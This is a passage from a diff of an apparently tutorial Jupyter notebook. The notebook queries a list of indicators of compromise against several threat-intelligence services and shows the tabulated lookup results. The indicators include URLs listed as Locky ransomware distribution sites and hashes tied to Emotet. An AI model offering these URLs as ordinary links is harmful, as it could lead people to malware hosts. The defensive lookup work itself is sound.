<td>http://104.248.196.145/apache2</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>url</td>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>url</td>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>51.75.29.61</td>\n      <td>ipv4</td>\n      <td>51.75.29.61</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/ip-address/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>33.44.55.66</td>\n      <td>ipv4</td>\n      <td>33.44.55.66</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/ip-address/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>52.183.120.194</td>\n      <td>ipv4</td>\n      <td>52.183.120.194</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'detected_urls': [], 'positives': 0...</td>\n      <td>{'undetected_urls': [['http://52.183.120.194/', 'a81857a8287017ddadd3cf776a1538e136b5bff261db758...</td>\n      <td>https://www.virustotal.com/vtapi/v2/ip-address/report</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092</td>\n      <td>sha256_hash</td>\n      <td>f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/file/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>cc2db822f652ca67038ba7cca8a8bde3</td>\n      <td>md5_hash</td>\n      <td>cc2db822f652ca67038ba7cca8a8bde3</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/file/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>ajaraheritage.ge</td>\n      <td>dns</td>\n      <td>ajaraheritage.ge</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/domain/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>0</th>\n      <td>http://104.248.196.145/apache2</td>\n      <td>url</td>\n      <td>http://104.248.196.145/apache2</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>False</td>\n      <td>information</td>\n      <td>Not found.</td>\n      <td>&lt;Response [404]&gt;</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://104.248.196.145/apache2</td>\n      <td>404</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>url</td>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'ajaraheritage.ge', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, '...</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://ajaraheritage.ge/g7cberv</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>url</td>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'cic-integration.com', 'cats': {}, 'score': None, 'categoryDescriptions': {}}...</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://cic-integration.com/hjy93JNBasdas</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>51.75.29.61</td>\n      <td>ipv4</td>\n      <td>51.75.29.61</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>warning</td>\n      <td>{'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...</td>\n      <td>{'ip': '51.75.29.61', 'history': [{'created': '2012-06-20T07:03:00.000Z', 'reason': 'Regional In...</td>\n      <td>https://api.xforce.ibmcloud.com/ipr/51.75.29.61</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>33.44.55.66</td>\n      <td>ipv4</td>\n      <td>33.44.55.66</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>warning</td>\n      <td>{'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...</td>\n      <td>{'ip': '33.44.55.66', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional In...</td>\n      <td>https://api.xforce.ibmcloud.com/ipr/33.44.55.66</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>52.183.120.194</td>\n      <td>ipv4</td>\n      <td>52.183.120.194</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>warning</td>\n      <td>{'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...</td>\n      <td>{'ip': '52.183.120.194', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional...</td>\n      <td>https://api.xforce.ibmcloud.com/ipr/52.183.120.194</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092</td>\n      <td>sha256_hash</td>\n      <td>f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'risk': 'high', 'family': None, 'reasonDescription': 0}</td>\n      <td>{'malware': {'origins': {'external': {'source': 'reversingLabs', 'firstSeen': '2019-01-31T17:30:...</td>\n      <td>https://api.xforce.ibmcloud.com/malware/f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf31...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>cc2db822f652ca67038ba7cca8a8bde3</td>\n      <td>md5_hash</td>\n      <td>cc2db822f652ca67038ba7cca8a8bde3</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'risk': 'high', 'family': None, 'reasonDescription': 0}</td>\n      <td>{'malware': {'origins': {'external': {'source': 'reversingLabs', 'firstSeen': '2019-01-22T11:37:...</td>\n      <td>https://api.xforce.ibmcloud.com/malware/cc2db822f652ca67038ba7cca8a8bde3</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>ajaraheritage.ge</td>\n      <td>dns</td>\n      <td>ajaraheritage.ge</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'ajaraheritage.ge', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, '...</td>\n      <td>https://api.xforce.ibmcloud.com/url/ajaraheritage.ge</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>51.75.29.61</td>\n      <td>ipv4</td>\n      <td>51.75.29.61</td>\n      <td>None</td>\n      <td>GreyNoise</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'Classification': 'malicious', 'Name': 'unknown', 'Last Seen': '2020-07-13', 'Message': 'Succes...</td>\n      <td>{'ip': '51.75.29.61', 'noise': True, 'riot': False, 'classification': 'malicious', 'name': 'unkn...</td>\n      <td>https://api.GreyNoise.io/v3/community/51.75.29.61</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>33.44.55.66</td>\n      <td>ipv4</td>\n      <td>33.44.55.66</td>\n      <td>None</td>\n      <td>GreyNoise</td>\n      <td>False</td>\n      <td>information</td>\n      <td>Not found.</td>\n      <td>&lt;Response [404]&gt;</td>\n      <td>https://api.GreyNoise.io/v3/community/33.44.55.66</td>\n      <td>404</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>52.183.120.194</td>\n      <td>ipv4</td>\n      <td>52.183.120.194</td>\n      <td>None</td>\n      <td>GreyNoise</td>\n      <td>False</td>\n      <td>information</td>\n      <td>Not found.</td>\n      <td>&lt;Response [404]&gt;</td>\n      <td>https://api.GreyNoise.io/v3/community/52.183.120.194</td>\n      <td>404</td>\n    </tr>\n    <tr>\n      <th>0</th>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:41.737387Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>http://104.248.196.145/apache2</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:41.737387Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:41.737387Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>33.44.55.66</td>\n      <td>ipv4</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:42.181869Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>52.183.120.194</td>\n      <td>ipv4</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:42.181869Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>51.75.29.61</td>\n      <td>ipv4</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:42.181869Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092</td>\n      <td>sha256_hash</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:43.210426Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>cc2db822f652ca67038ba7cca8a8bde3</td>\n      <td>md5_hash</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:43.719053Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>ajaraheritage.ge</td>\n      <td>dns</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:44.227195Z) | w...</td>\n      <td>0</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "                                                                Ioc  \\\n0                                    http://104.248.196.145/apache2   \n1                                   http://ajaraheritage.ge/g7cberv   \n2                          http://cic-integration.com/hjy93JNBasdas   \n3                                                       51.75.29.61   \n4                                                       33.44.55.66   \n5                                                    52.183.120.194   \n6  f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092   \n7                                  cc2db822f652ca67038ba7cca8a8bde3   \n8                                                  ajaraheritage.ge   \n0                                    http://104.248.196.145/apache2   \n1                                   http://ajaraheritage.ge/g7cberv   \n2                          http://cic-integration.com/hjy93JNBasdas   \n3                                                       51.75.29.61   \n4                                                       33.44.55.66   \n5                                                    52.183.120.194   \n6  f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092   \n7                                  cc2db822f652ca67038ba7cca8a8bde3   \n8                                                  ajaraheritage.ge   \n0                                    http://104.248.196.145/apache2   \n1                                   http://ajaraheritage.ge/g7cberv   \n2                          http://cic-integration.com/hjy93JNBasdas   \n3                                                       51.75.29.61   \n4                                                       33.44.55.66   \n5                                                    52.183.120.194   \n6  f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092   \n7                                  cc2db822f652ca67038ba7cca8a8bde3   \n8                                                  ajaraheritage.ge   \n3                                                       51.75.29.61   \n4                                                       33.44.55.66   \n5                                                    52.183.120.194   \n0                                   http://ajaraheritage.ge/g7cberv   \n1                                    http://104.248.196.145/apache2   \n2                          http://cic-integration.com/hjy93JNBasdas   \n3                                                       33.44.55.66   \n4                                                    52.183.120.194   \n5                                                       51.75.29.61   \n6  f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092   \n7                                  cc2db822f652ca67038ba7cca8a8bde3   \n8                                                  ajaraheritage.ge   \n\n       IocType  \\\n0          url   \n1          url   \n2          url   \n3         ipv4   \n4         ipv4   \n5         ipv4   \n6  sha256_hash   \n7     md5_hash   \n8          dns   \n0          url   \n1          url   \n2          url   \n3         ipv4   \n4         ipv4   \n5         ipv4   \n6  sha256_hash   \n7     md5_hash   \n8          dns   \n0          url   \n1          url   \n2          url   \n3         ipv4   \n4         ipv4   \n5         ipv4   \n6  sha256_hash   \n7     md5_hash   \n8          dns   \n3         ipv4   \n4         ipv4   \n5         ipv4   \n0          url   \n1          url   \n2          url   \n3         ipv4   \n4         ipv4   \n5         ipv4   \n6  sha256_hash   \n7     md5_hash   \n8          dns   \n\n                                                            SafeIoc  \\\n0                            http%3A%2F%2F104.248.196.145%2Fapache2   \n1                           http%3A%2F%2Fajaraheritage.ge%2Fg7cberv   \n2                  http%3A%2F%2Fcic-integration.com%2Fhjy93JNBasdas   \n3                                                       51.75.29.61   \n4                                                       33.44.55.66   \n5                                                    52.183.120.194   \n6  f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092   \n7                                  cc2db822f652ca67038ba7cca8a8bde3   \n8                                                  ajaraheritage.ge   \n0                                    http://104.248.196.145/apache2   \n1                                   http://ajaraheritage.ge/g7cberv   \n2                          http://cic-integration.com/hjy93JNBasdas   \n3                                                       51.75.29.61   \n4                                                       33.44.55.66   \n5                                                    52.183.120.194   \n6  f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092   \n7                                  cc2db822f652ca67038ba7cca8a8bde3   \n8                                                  ajaraheritage.ge   \n0                                    http://104.248.196.145/apache2   \n1                                   http://ajaraheritage.ge/g7cberv   \n2                          http://cic-integration.com/hjy93JNBasdas   \n3                                                       51.75.29.61   \n4                                                       33.44.55.66   \n5                                                    52.183.120.194   \n6  f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092   \n7                                  cc2db822f652ca67038ba7cca8a8bde3   \n8                                                  ajaraheritage.ge   \n3                                                       51.75.29.61   \n4                                                       33.44.55.66   \n5                                                    52.183.120.194   \n0                                                               NaN   \n1                                                               NaN   \n2                                                               NaN   \n3                                                               NaN   \n4                                                               NaN   \n5                                                               NaN   \n6                                                               NaN   \n7                                                               NaN   \n8                                                               NaN   \n\n  QuerySubtype    Provider  Result     Severity  \\\n0         None         OTX    True  information   \n1         None         OTX    True         high   \n2         None         OTX    True      warning   \n3         None         OTX    True         high   \n4         None         OTX    True  information   \n5         None         OTX    True  information   \n6         None         OTX    True         high   \n7         None         OTX    True  information   \n8         None         OTX    True         high   \n0         None  VirusTotal   False  information   \n1         None  VirusTotal   False  information   \n2         None  VirusTotal   False  information   \n3         None  VirusTotal   False  information   \n4         None  VirusTotal   False  information   \n5         None  VirusTotal    True  information   \n6         None  VirusTotal   False  information   \n7         None  VirusTotal   False  information   \n8         None  VirusTotal   False  information   \n0         None      XForce   False  information   \n1         None      XForce    True  information   \n2         None      XForce    True  information   \n3         None      XForce    True      warning   \n4         None      XForce    True      warning   \n5         None      XForce    True      warning   \n6         None      XForce    True         high   \n7         None      XForce    True         high   \n8         None      XForce    True  information   \n3         None   GreyNoise    True         high   \n4         None   GreyNoise   False  information   \n5         None   GreyNoise   False  information   \n0         None       AzSTI   False            0   \n1         None       AzSTI   False            0   \n2         None       AzSTI   False            0   \n3         None       AzSTI   False            0   \n4         None       AzSTI   False            0   \n5         None       AzSTI   False            0   \n6         None       AzSTI   False            0   \n7         None       AzSTI   False            0   \n8         None       AzSTI   False            0   \n\n                                                                                               Details  \\\n0        {'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}   \n1  {'pulse_count': 2, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)', ...   \n2  {'pulse_count': 1, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)'],...   \n3  {'pulse_count': 50, 'names': ['IOCs - 202135947 - ANIA Threat Feeds - IP Segment 0', 'IOCs - 202...   \n4  {'pulse_count': 0, 'sections_available': ['general', 'geo', 'reputation', 'url_list', 'passive_d...   \n5  {'pulse_count': 0, 'sections_available': ['general', 'geo', 'reputation', 'url_list', 'passive_d...   \n6  {'pulse_count': 3, 'names': ['Emotet IOCs 2/4/2019', 'Emotet IOCs 2/1/2019', 'Emotet IOCs 1/31/2...   \n7                                    {'pulse_count': 0, 'sections_available': ['general', 'analysis']}   \n8  {'pulse_count': 27, 'names': ['Veronica.muratori ', 'Veronica.muratori ', 'https://instagram.com...   \n0                                                                                           No Content   \n1                                                                                           No Content   \n2                                                                                           No Content   \n3                                                                                           No Content   \n4                                                                                           No Content   \n5  {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'detected_urls': [], 'positives': 0...   \n6                                                                                           No Content   \n7                                                                                           No Content   \n8                                                                                           No Content   \n0                                                                                           Not found.   \n1  {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n2  {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n3  {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...   \n4  {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...   \n5  {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...   \n6                                             {'risk': 'high', 'family': None, 'reasonDescription': 0}   \n7                                             {'risk': 'high', 'family': None, 'reasonDescription': 0}   \n8  {'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...   \n3  {'Classification': 'malicious', 'Name': 'unknown', 'Last Seen': '2020-07-13', 'Message': 'Succes...   \n4                                                                                           Not found.   \n5                                                                                           Not found.   \n0                                                                                           Not found.   \n1                                                                                           Not found.   \n2                                                                                           Not found.   \n3                                                                                           Not found.   \n4                                                                                           Not found.   \n5                                                                                           Not found.   \n6                                                                                           Not found.   \n7                                                                                           Not found.   \n8                                                                                           Not found.   \n\n                                                                                             RawResult  \\\n0  {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://104.248.1...   \n1  {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://ajaraheri...   \n2  {'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://cic-integ...   \n3  {'whois': 'http://whois.domaintools.com/51.75.29.61', 'reputation': 0, 'indicator': '51.75.29.61...   \n4  {'whois': 'http://whois.domaintools.com/33.44.55.66', 'reputation': 0, 'indicator': '33.44.55.66...   \n5  {'whois': 'http://whois.domaintools.com/52.183.120.194', 'reputation': 0, 'indicator': '52.183.1...   \n6  {'sections': ['general', 'analysis'], 'type': 'sha256', 'type_title': 'FileHash-SHA256', 'indica...   \n7  {'sections': ['general', 'analysis'], 'type': 'md5', 'type_title': 'FileHash-MD5', 'indicator': ...   \n8  {'sections': ['general', 'geo', 'url_list', 'passive_dns', 'malware', 'whois', 'http_scans'], 'w...   \n0                                                                                     <Response [204]>   \n1                                                                                     <Response [204]>   \n2                                                                                     <Response [204]>   \n3                                                                                     <Response [204]>   \n4                                                                                     <Response [204]>   \n5  {'undetected_urls': [['http://52.183.120.194/', 'a81857a8287017ddadd3cf776a1538e136b5bff261db758...   \n6                                                                                     <Response [204]>   \n7                                                                                     <Response [204]>   \n8                                                                                     <Response [204]>   \n0                                                                                     <Response [404]>   \n1  {'result': {'url': 'ajaraheritage.ge', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, '...   \n2  {'result': {'url': 'cic-integration.com', 'cats': {}, 'score': None, 'categoryDescriptions': {}}...   \n3  {'ip': '51.75.29.61', 'history': [{'created': '2012-06-20T07:03:00.000Z', 'reason': 'Regional In...   \n4  {'ip': '33.44.55.66', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional In...   \n5  {'ip': '52.183.120.194', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional...   \n6  {'malware': {'origins': {'external': {'source': 'reversingLabs', 'firstSeen': '2019-01-31T17:30:...   \n7  {'malware': {'origins': {'external': {'source': 'reversingLabs', 'firstSeen': '2019-01-22T11:37:...   \n8  {'result': {'url': 'ajaraheritage.ge', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, '...   \n3  {'ip': '51.75.29.61', 'noise': True, 'riot': False, 'classification': 'malicious', 'name': 'unkn...   \n4                                                                                     <Response [404]>   \n5                                                                                     <Response [404]>   \n0                                                                                                  NaN   \n1                                                                                                  NaN   \n2                                                                                                  NaN   \n3                                                                                                  NaN   \n4                                                                                                  NaN   \n5                                                                                                  NaN   \n6                                                                                                  NaN   \n7                                                                                                  NaN   \n8                                                                                                  NaN   \n\n                                                                                             Reference  \\\n0      https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2F104.248.196.145%2Fapache2/general   \n1     https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fajaraheritage.ge%2Fg7cberv/general   \n2  https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fcic-integration.com%2Fhjy93JNBasda...   \n3                                https://otx.alienvault.com/api/v1/indicators/IPv4/51.75.29.61/general   \n4                                https://otx.alienvault.com/api/v1/indicators/IPv4/33.44.55.66/general   \n5                             https://otx.alienvault.com/api/v1/indicators/IPv4/52.183.120.194/general   \n6  https://otx.alienvault.com/api/v1/indicators/file/f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5...   \n7           https://otx.alienvault.com/api/v1/indicators/file/cc2db822f652ca67038ba7cca8a8bde3/general   \n8                         https://otx.alienvault.com/api/v1/indicators/domain/ajaraheritage.ge/general   \n0                                                       https://www.virustotal.com/vtapi/v2/url/report   \n1                                                       https://www.virustotal.com/vtapi/v2/url/report   \n2                                                       https://www.virustotal.com/vtapi/v2/url/report   \n3                                                https://www.virustotal.com/vtapi/v2/ip-address/report   \n4                                                https://www.virustotal.com/vtapi/v2/ip-address/report   \n5                                                https://www.virustotal.com/vtapi/v2/ip-address/report   \n6                                                      https://www.virustotal.com/vtapi/v2/file/report   \n7                                                      https://www.virustotal.com/vtapi/v2/file/report   \n8                                                    https://www.virustotal.com/vtapi/v2/domain/report   \n0                                   https://api.xforce.ibmcloud.com/url/http://104.248.196.145/apache2   \n1                                  https://api.xforce.ibmcloud.com/url/http://ajaraheritage.ge/g7cberv   \n2                         https://api.xforce.ibmcloud.com/url/http://cic-integration.com/hjy93JNBasdas   \n3                                                      https://api.xforce.ibmcloud.com/ipr/51.75.29.61   \n4                                                      https://api.xforce.ibmcloud.com/ipr/33.44.55.66   \n5                                                   https://api.xforce.ibmcloud.com/ipr/52.183.120.194   \n6  https://api.xforce.ibmcloud.com/malware/f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf31...   \n7                             https://api.xforce.ibmcloud.com/malware/cc2db822f652ca67038ba7cca8a8bde3   \n8                                                 https://api.xforce.ibmcloud.com/url/ajaraheritage.ge   \n3                                                    https://api.GreyNoise.io/v3/community/51.75.29.61   \n4                                                    https://api.GreyNoise.io/v3/community/33.44.55.66   \n5                                                 https://api.GreyNoise.io/v3/community/52.183.120.194   \n0   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:41.737387Z) | w...   \n1   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:41.737387Z) | w...   \n2   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:41.737387Z) | w...   \n3   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:42.181869Z) | w...   \n4   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:42.181869Z) | w...   \n5   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:42.181869Z) | w...   \n6   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:43.210426Z) | w...   \n7   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:43.719053Z) | w...   \n8   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-03-22T18:22:44.227195Z) | w...   \n\n   Status  \n0       0  \n1       0  \n2       0  \n3       0  \n4       0  \n5       0  \n6       0  \n7       0  \n8       0  \n0     204  \n1     204  \n2     204  \n3     204  \n4     204  \n5       0  \n6     204  \n7     204  \n8     204  \n0     404  \n1       0  \n2       0  \n3       0  \n4       0  \n5       0  \n6       0  \n7       0  \n8       0  \n3       0  \n4     404  \n5     404  \n0       0  \n1       0  \n2       0  \n3       0  \n4       0  \n5       0  \n6       0  \n7       0  \n8       0  "
+     },
+     "execution_count": 20,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ioc_mixed = [\n",
+    "    \"http://104.248.196.145/apache2\",\n",
+    "    \"http://ajaraheritage.ge/g7cberv\",\n",
+    "    \"http://cic-integration.com/hjy93JNBasdas\",\n",
+    "    \"51.75.29.61\",\n",
+    "    \"33.44.55.66\",\n",
+    "    \"52.183.120.194\",\n",
+    "    \"f8a7135496fd6168df5f0ea21c745db89ecea9accc29c5cf281cdf3145865092\",\n",
+    "    \"cc2db822f652ca67038ba7cca8a8bde3\",\n",
+    "    \"ajaraheritage.ge\",\n",
+    "]\n",
+    "results = ti_lookup.lookup_iocs(data=ioc_mixed)\n",
+    "results"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Browsing TI Results\n",
+    "To make it easier to walk through the returned results there is a browser. \n",
+    "This shows you results aggregated by the IoC value (e.g. an individual IP \n",
+    "Address or URL) for all providers.\n",
+    "\n",
+    "For each provider that returns a result for an IoC, the summarized details \n",
+    "will be shown in a table below the browse list.\n",
+    "Click on `Raw results from provider...` to see all returned data.\n",
+    "\n",
+    "> **Note**: the reference URL may not work if you have not authenticated\n",
